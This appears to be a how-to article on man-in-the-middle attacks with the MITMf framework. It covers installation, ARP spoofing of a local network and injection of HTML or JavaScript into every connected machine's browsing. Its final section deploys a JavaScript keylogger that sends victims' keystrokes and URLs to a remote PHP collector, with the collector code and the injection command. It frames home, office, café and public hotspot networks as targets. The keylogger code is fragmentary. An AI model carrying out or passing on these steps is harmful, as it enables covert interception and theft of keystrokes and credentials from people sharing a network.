In cryptography and computer security, a MITM attack (man-in-the-middle) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other. One example of man-in-the-middle attacks is active eavesdropping, in which the attacker makes independent connections with the victims and relays messages between them to make them believe they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. The attacker must be able to intercept all relevant messages passing between the two victims and inject new ones. This is straightforward in many circumstances; for example, an attacker within the reception range of an unencrypted wireless access point (Wi-Fi) could insert himself as a man-in-the-middle.
As an attack that aims at circumventing mutual authentication, or lack thereof, a man-in-the-middle attack can succeed only when the attacker can impersonate each endpoint to their satisfaction as expected from the legitimate ends. Most cryptographic protocols include some form of endpoint authentication specifically to prevent MITM attacks. For example, TLS can authenticate one or both parties using a mutually trusted certificate authority.
WHAT IS MITMF
MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.
Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it's been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their MITM attack.
- The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
- As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.
- The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.
- MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP, etc.) and Kerberos credentials by using Net-Creds, which is run on startup.
- Responder integration allows for LLMNR, NBT-NS, and MDNS poisoning and WPAD rogue server support.
Installing MITMf is quite easy and doesn't require advanced skills. To do it just open your terminal and type one by one the below commands.
On Arch Linux
pacman -S python2-setuptools libnetfilter_queue libpcap libjpeg-turbo capstone
On Debian and derivatives such as Ubuntu, Kali Linux etc ...
sudo apt install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
If you're using Arch Linux just remember to use "pip2" instead of "pip" outside of the "virtualenv".
pip install virtualenvwrapper
Edit your .bashrc or .zshrc file to source the virtualenvwrapper.sh script.
The location of this script may vary depending on your Linux distro. When you are done simply restart your terminal or run:
Create your virtualenv
mkvirtualenv MITMf -p /usr/bin/python2.7
Clone the MITMf repository
sudo git clone https://github.com/byt3bl33d3r/MITMf mitmf
cd mitmf && sudo git submodule init && sudo git submodule update --recursive
sudo pip install -r requirements.txt
chmod +x mitmf.py
HOW IT WORKS ?
The attack schema is pretty simple actually. The attacking machine needs to connect to a network where other machines are connected. This can be a home network, an office network, a cyber cafe network or either a public hotspot.
Once the attacking machine is connected, you will have to run the commands we provided below to inject your arbitrary code into all the machines connected in the same network then the attacking machine.
Before to move further you will need to grab your gateway address and your network interface. You can do it simply using "ifconfig" and "iproute" commands as the following examples.
Find my interface name
As you can see in the above screenshot, in our case the interface name is "wlp2s0".
Find my router gateway
From the above output, it is clear that 192.168.1.1 is the default gateway IP address.
Inject HTML Code
mkdir demo && cd demo
echo '<div>HTML code to inject</div>' > ~/demo/inject.html
sudo ./mitmf.py --inject --html-file ~/demo/inject.html --spoof --arp --gateway 192.168.1.1 -i wlp2s0
Inject JS Code
mkdir demo && cd demo
sudo ./mitmf.py --inject --js-file ~/demo/inject.js --spoof --arp --gateway 192.168.1.1 -i wlp2s0
Important: If you have Apache and/or SMB installed, you will need to stop those services before to run MITMf to avoid any port conflict.
DEPLOY THE ATTACK
Create JS Keylogger file - keylogger.js
console.log("jQuery Not Found");
var script = document.createElement('script');
script.src = 'https://code.jquery.com/jquery-3.3.1.min.js';
error:function(xhr, ajaxOptions, thrownError)
window.onload = function()
Please be sure to replace "https://example.com/keylogger.php" with the real URL of your PHP file.
Create PHP Keylogger file - keylogger.php
header($_SERVER["SERVER_PROTOCOL"]." 404 Not Found", true, 404);
header('Access-Control-Allow-Methods: GET, REQUEST, OPTIONS');
header('Access-Control-Allow-Headers: Content-Type, *');
$file = 'data.txt';
$fh = fopen($file, 'w');
$string = $altnKey."|".$ctrlKey."|".$userKey."|".$targKey."|".$userURI." ";
file_put_contents($file, $string, FILE_APPEND);
The "keylogger.php" must be hosted to a remote server and the full file URL must be specified in the "keylogger.js" file.
Inject the JS file
sudo ./mitmf.py --inject --js-file ~/demo/keylogger.js --spoof --arp --gateway 192.168.1.1 -i wlp2s0